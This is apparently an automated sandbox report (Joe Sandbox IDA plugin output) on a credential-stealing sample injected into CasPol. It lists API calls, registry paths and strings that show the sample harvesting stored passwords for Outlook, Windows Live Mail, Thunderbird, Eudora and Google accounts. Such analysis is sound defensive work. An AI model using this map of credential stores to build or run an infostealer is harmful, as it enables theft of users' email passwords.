405f53 12 API calls 34348 43f956 59 API calls 34350 40955a 17 API calls 34351 428561 36 API calls 34352 409164 7 API calls 34540 404366 19 API calls 34544 40176c ExitProcess 34547 410777 42 API calls 34357 40dd7b 51 API calls 34358 425d7c 16 API calls __fprintf_l 34549 43f6f0 25 API calls 34550 42db01 22 API calls 34359 412905 15 API calls __fprintf_l 34551 403b04 54 API calls 34552 405f04 SetDlgItemTextA GetDlgItemTextA 34553 44b301 ??3@YAXPAX 34556 4120ea 14 API calls 3 library calls 34557 40bb0a 8 API calls 34559 413f11 strcmp 34363 434110 17 API calls __fprintf_l 34366 425115 108 API calls __fprintf_l 34560 444b11 _onexit 34368 425115 76 API calls __fprintf_l 34371 429d19 10 API calls 34563 444b1f __dllonexit 34564 409f20 _strcmpi 34373 42b927 31 API calls 34567 433f26 19 API calls __fprintf_l 34568 44b323 FreeLibrary 34569 427f25 46 API calls 34570 43ff2b 17 API calls 33185 444b36 33188 444b10 33185->33188 33187 444b3f 33189 444b1f __dllonexit 33188->33189 33190 444b19 _onexit 33188->33190 33189->33187 33190->33189 34571 43fb30 19 API calls 34380 414d36 16 API calls 34382 40ad38 7 API calls 34573 433b38 16 API calls __fprintf_l 34574 44b33b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 34386 426741 21 API calls 34387 40c5c3 125 API calls 34389 43fdc5 17 API calls 34575 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34392 4161cb memcpy memcpy memcpy memcpy 33200 44b3cf 33201 44b3e6 33200->33201 33203 44b454 33200->33203 33201->33203 33207 44b40e 33201->33207 33204 44b405 33204->33203 33205 44b435 VirtualProtect 33204->33205 33205->33203 33206 44b444 VirtualProtect 33205->33206 33206->33203 33208 44b413 33207->33208 33210 44b454 33208->33210 33214 44b42b 33208->33214 33211 44b41c 33211->33210 33212 44b435 VirtualProtect 33211->33212 33212->33210 33213 44b444 VirtualProtect 33212->33213 33213->33210 33215 44b431 33214->33215 33216 44b435 VirtualProtect 33215->33216 33218 44b454 33215->33218 33217 44b444 VirtualProtect 33216->33217 33216->33218 
33217->33218 34580 43ffc8 18 API calls 34393 4281cc 15 API calls __fprintf_l 34582 4383cc 110 API calls __fprintf_l 34394 4275d3 41 API calls 34583 4153d3 22 API calls __fprintf_l 34395 444dd7 _XcptFilter 34588 4013de 15 API calls 34590 425115 111 API calls __fprintf_l 34591 43f7db 18 API calls 34594 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34397 4335ee 16 API calls __fprintf_l 34596 429fef 11 API calls 34398 444deb _exit _c_exit 34597 40bbf0 139 API calls 34401 425115 79 API calls __fprintf_l 34601 437ffa 22 API calls 34405 4021ff 14 API calls 34406 43f5fc 149 API calls 34602 40e381 9 API calls 34408 405983 40 API calls 34409 42b186 27 API calls __fprintf_l 34410 427d86 76 API calls 34411 403585 20 API calls 34413 42e58e 18 API calls __fprintf_l 34416 425115 75 API calls __fprintf_l 34418 401592 8 API calls 33191 410b92 33194 410a6b 33191->33194 33193 410bb2 33195 410a77 33194->33195 33196 410a89 GetPrivateProfileIntA 33194->33196 33199 410983 memset _itoa WritePrivateProfileStringA 33195->33199 33196->33193 33198 410a84 33198->33193 33199->33198 34606 434395 16 API calls 34420 441d9c memcmp 34608 43f79b 119 API calls 34421 40c599 43 API calls 34609 426741 87 API calls 34425 4401a6 21 API calls 34427 426da6 memcpy memset memset memcpy 34428 4335a5 15 API calls 34430 4299ab memset memset memcpy memset memset 34431 40b1ab 8 API calls 34614 425115 76 API calls __fprintf_l 34618 4113b2 18 API calls 2 library calls 34622 40a3b8 memset sprintf SendMessageA 33219 410bbc 33222 4109cf 33219->33222 33223 4109dc 33222->33223 33224 410a23 memset GetPrivateProfileStringA 33223->33224 33225 4109ea memset 33223->33225 33230 407646 strlen 33224->33230 33235 4075cd sprintf memcpy 33225->33235 33228 410a0c WritePrivateProfileStringA 33229 410a65 33228->33229 33231 40765a 33230->33231 33233 40765c 33230->33233 33231->33229 33232 4076a3 33232->33229 33233->33232 33236 40737c strtoul 33233->33236 33235->33228 33236->33233 34433 40b5bf memset memset _mbsicmp

Control-flow Graph
• Executed
• Not Executed
Control-flow Graph for 004082CD-0040841A: memset × 4, GetComputerNameA, GetUserNameA, MultiByteToWideChar × 2, strlen × 2, memcpy (block edge list omitted)
APIs
• memset.MSVCRT ref: 0040832F
• memset.MSVCRT ref: 00408343
• memset.MSVCRT ref: 0040835F
• memset.MSVCRT ref: 00408376
• GetComputerNameA.KERNEL32(?,?), ref: 00408398
• GetUserNameA.ADVAPI32(?,?), ref: 004083AC
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
• strlen.MSVCRT ref: 004083E9
• strlen.MSVCRT ref: 004083F8
• memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
• String ID: 5$H$O$b$i$}$}
• API String ID: 1832431107-3760989150
• Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
• Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
• Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
• Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
APIs
• FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
• FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
• strlen.MSVCRT ref: 00407F5C
• strlen.MSVCRT ref: 00407F64
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: FileFindstrlen$FirstNext
• String ID: ACD
• API String ID: 379999529-620537770
• Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
• Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
• Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
• Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

Control-flow Graph

APIs
• memset.MSVCRT ref: 00401E8B
  • Part of subcall function 00410DBB: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 00410DF2
• strlen.MSVCRT ref: 00401EA4
• strlen.MSVCRT ref: 00401EB2
• strlen.MSVCRT ref: 00401EF8
• strlen.MSVCRT ref: 00401F06
• memset.MSVCRT ref: 00401FB1
• atoi.MSVCRT(?), ref: 00401FE0
• memset.MSVCRT ref: 00402003
• sprintf.MSVCRT ref: 00402030
  • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
• memset.MSVCRT ref: 00402086
• memset.MSVCRT ref: 0040209B
• strlen.MSVCRT ref: 004020A1
• strlen.MSVCRT ref: 004020AF
• strlen.MSVCRT ref: 004020E2
• strlen.MSVCRT ref: 004020F0
• memset.MSVCRT ref: 00402018
  • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
  • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
• _mbscpy.MSVCRT(?,00000000), ref: 00402177
• RegCloseKey.ADVAPI32(00000000), ref: 00402181
• ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
  • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileFolderPathSpecialStrings_mbscatatoisprintf
• String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
• API String ID: 52128907-4223776976
• Opcode ID: 0586a96bd1dd566e4e6b01723853c75a2a65919309edaf857d44129f31cda3b9
• Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
• Opcode Fuzzy Hash: 0586a96bd1dd566e4e6b01723853c75a2a65919309edaf857d44129f31cda3b9
• Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

Control-flow Graph

APIs
• memset.MSVCRT ref: 00402869
  • Part of subcall function 004029A2: RegQueryValueExA.KERNEL32(00000400,?,00000000,?,?,?), ref: 004029D3
• _mbscpy.MSVCRT(?,?,770145ED,?,00000000), ref: 004028A3
  • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
• _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,770145ED,?,00000000), ref: 0040297B
  • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: QueryValue_mbscpy$ByteCharMultiWidememset
• String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
• API String ID: 1497257669-167382505
• Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
• Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
• Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
• Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98

Control-flow Graph

APIs
  • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
  • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
  • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
  • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
• ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
• DeleteObject.GDI32(?), ref: 0040D1A6
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
• String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
• API String ID: 745651260-375988210
• Opcode ID: 281cc72733d93a48e74a4e104f31179254ddf1e53b96f5d983554f03d68ac606
• Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
• Opcode Fuzzy Hash: 281cc72733d93a48e74a4e104f31179254ddf1e53b96f5d983554f03d68ac606
• Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

Control-flow Graph

APIs
  • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
• LoadLibraryA.KERNEL32(pstorec.dll), ref: 00403C35
• GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
• _mbscpy.MSVCRT(?,?), ref: 00403E54
Strings
• pstorec.dll, xrefs: 00403C30
• Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
• Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
• www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
• Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
• www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
• Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
• www.google.com/Please log in to your Gmail account, xrefs: 00403C86
• Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
• Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
• PStoreCreateInstance, xrefs: 00403C44
• www.google.com/Please log in to your Google Account, xrefs: 00403C9A
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc_mbscpy
• String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
• API String ID: 1197458902-317895162
• Opcode ID: 7553cdf7f2ce1cf444f62a1d2691c4a3b1dbf44d811f574412da19563fe3f526
• Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
• Opcode Fuzzy Hash: 7553cdf7f2ce1cf444f62a1d2691c4a3b1dbf44d811f574412da19563fe3f526
• Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

Control-flow Graph

control_flow_graph 261 444c4a-444c66 call 444e38 GetModuleHandleA 264 444c87-444c8a 261->264 265 444c68-444c73 261->265 267 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 264->267 265->264 266 444c75-444c7e 265->266 269 444c80-444c85 266->269 270 444c9f-444ca3 266->270 275 444d02-444d0d __setusermatherr 267->275 276 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 267->276 269->264 273 444c8c-444c93 269->273 270->264 271 444ca5-444ca7 270->271 274 444cad-444cb0 271->274 273->264 277 444c95-444c9d 273->277 274->267 275->276 280 444da4-444da7 276->280 281 444d6a-444d72 276->281 277->274 282 444d81-444d85 280->282 283 444da9-444dad 280->283 284 444d74-444d76 281->284 285 444d78-444d7b 281->285 287 444d87-444d89 282->287 288 444d8b-444d9c GetStartupInfoA 282->288 283->280 284->281 284->285 285->282 286 444d7d-444d7e 285->286 286->282 287->286 287->288 289 444d9e-444da2 288->289 290 444daf-444db1 288->290 291 444db2-444dc6 GetModuleHandleA call 40cf44 289->291 290->291 294 444dcf-444e0f _cexit call 444e71 291->294 295 444dc8-444dc9 exit 291->295 295->294
APIs
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
• String ID: 2t
• API String ID: 3662548030-3527913779
• Opcode ID: a2c5e685021b953e45b16df810cc3e629d637f1bb2461c548f2803c140be0595
• Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
• Opcode Fuzzy Hash: a2c5e685021b953e45b16df810cc3e629d637f1bb2461c548f2803c140be0595
• Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D

Control-flow Graph

control_flow_graph 299 40fb00-40fb35 call 44b090 RegOpenKeyExA 302 40fc37-40fc3d 299->302 303 40fb3b-40fb4f RegOpenKeyExA 299->303 304 40fb55-40fb7e RegQueryValueExA 303->304 305 40fc2d-40fc31 RegCloseKey 303->305 306 40fc23-40fc27 RegCloseKey 304->306 307 40fb84-40fb93 call 404734 304->307 305->302 306->305 307->306 310 40fb99-40fbd1 call 4047a5 307->310 310->306 313 40fbd3-40fbdb 310->313 314 40fc19-40fc1d LocalFree 313->314 315 40fbdd-40fc14 memcpy * 2 call 40f802 313->315 314->306 315->314
APIs
• RegOpenKeyExA.KERNEL32(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
• RegOpenKeyExA.ADVAPI32(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
• RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
• RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
  • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?,?,00000000), ref: 00404754
• memcpy.MSVCRT(?,00456E58,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
• memcpy.MSVCRT(?,?,?), ref: 0040FBF9
  • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
  • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
  • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
  • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
• LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
• RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC31
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
• String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
• API String ID: 2768085393-2409096184
• Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
• Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
• Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
• Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A

Control-flow Graph

control_flow_graph 317 402c5d-402c81 call 410a9c 320 402da5-402db0 317->320 321 402c87-402cb7 memset call 410b62 317->321 324 402d9c-402d9f RegCloseKey 321->324 325 402cbd-402cbf 321->325 324->320 326 402cc4-402d2d call 410b1e memset sprintf call 410a9c 325->326 331 402d3a-402d6b sprintf call 410a9c 326->331 332 402d2f-402d35 call 402bd1 326->332 336 402d7a-402d8a call 410b62 331->336 337 402d6d-402d75 call 402bd1 331->337 332->331 340 402d8f-402d94 336->340 337->336 340->326 341 402d9a-402d9b 340->341 341->324
APIs
  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
• memset.MSVCRT ref: 00402C9D
  • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
• RegCloseKey.ADVAPI32(?), ref: 00402D9F
  • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
• memset.MSVCRT ref: 00402CF7
• sprintf.MSVCRT ref: 00402D10
• sprintf.MSVCRT ref: 00402D4E
  • Part of subcall function 00402BD1: memset.MSVCRT ref: 00402BF1
  • Part of subcall function 00402BD1: RegCloseKey.ADVAPI32 ref: 00402C55
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: Closememset$sprintf$EnumOpen
• String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
• API String ID: 1831126014-3814494228
• Opcode ID: b1494c850d96e19dfebe9b6e5b972ea39351de22b51df2d3807edb00f3b2aba3
• Instruction ID: 079f63aacd2b880b2e0576cff081af09170d207e8fe08998d1b5f7116231a607
                                                                                                                                                                                    • Opcode Fuzzy Hash: b1494c850d96e19dfebe9b6e5b972ea39351de22b51df2d3807edb00f3b2aba3
                                                                                                                                                                                    • Instruction Fuzzy Hash: C7313072D0011DBADB11DA91CD46FEFB77CAF14345F0404A6BA18B2191E7B8AF849B64

Control-flow Graph

APIs
• memset.MSVCRT ref: 0044430B
  • Part of subcall function 00410DBB: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 00410DF2
  • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
  • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
  • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
  • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
  • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
  • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
• memset.MSVCRT ref: 00444379
• memset.MSVCRT ref: 00444394
  • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
• ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
• strlen.MSVCRT ref: 004443DB
• _strcmpi.MSVCRT ref: 00444401
Strings
• \Microsoft\Windows Live Mail, xrefs: 00444350
• \Microsoft\Windows Mail, xrefs: 00444329
• Store Root, xrefs: 004443A5
• Software\Microsoft\Windows Live Mail, xrefs: 004443AA
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: memset$strlen$Close$EnvironmentExpandFolderPathSpecialStrings_mbscat_mbscpy_strcmpi
• String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
• API String ID: 1502082548-2578778931
• Opcode ID: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
• Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
• Opcode Fuzzy Hash: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
• Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

Control-flow Graph (graph image omitted)
APIs
• memset.MSVCRT ref: 0040F567
• memset.MSVCRT ref: 0040F57F
  • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
• RegOpenKeyExA.KERNEL32(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
• RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
• RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
  • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
  • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?,?,00000000), ref: 00404754
• memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
• LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
• RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
• String ID:
• API String ID: 2012582556-3916222277
• Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
• Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
• Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
• Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA

Control-flow Graph (graph image omitted)
APIs
• memset.MSVCRT ref: 004037EB
• memset.MSVCRT ref: 004037FF
  • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
  • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
• strchr.MSVCRT ref: 0040386E
• _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
• strlen.MSVCRT ref: 00403897
• sprintf.MSVCRT ref: 004038B7
• _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
• String ID: %s@yahoo.com
• API String ID: 317221925-3288273942
• Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
• Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
• Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
• Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59

Control-flow Graph (graph image omitted)
APIs
  • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
  • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
  • Part of subcall function 00410863: memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
  • Part of subcall function 00410863: CoTaskMemFree.OLE32(?), ref: 004108D2
• strchr.MSVCRT ref: 0040371F
• _mbscpy.MSVCRT(?,00000001,?,?,?), ref: 00403748
• _mbscpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403758
• strlen.MSVCRT ref: 00403778
• sprintf.MSVCRT ref: 0040379C
• _mbscpy.MSVCRT(?,?), ref: 004037B2
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
• String ID: %s@gmail.com
• API String ID: 3261640601-4097000612
• Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
